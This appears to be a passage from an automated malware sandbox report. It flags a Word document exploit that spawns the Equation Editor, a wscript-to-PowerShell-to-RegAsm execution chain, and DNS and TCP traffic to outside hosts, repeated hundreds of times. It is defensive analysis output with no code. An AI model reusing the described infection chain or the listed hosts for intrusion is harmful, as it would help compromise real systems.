                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,9_2_00407CD2

                Software Vulnerabilities

                barindex
                Document exploit detected (process start blacklist hit)
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Suspicious execution chain found
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: global trafficDNS query: name: ia601706.us.archive.org
                Source: global trafficDNS query: name: geoplugin.net
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 178.237.33.50:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 45.90.89.123:80
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 45.90.89.123:80 -> 192.168.2.22:49161
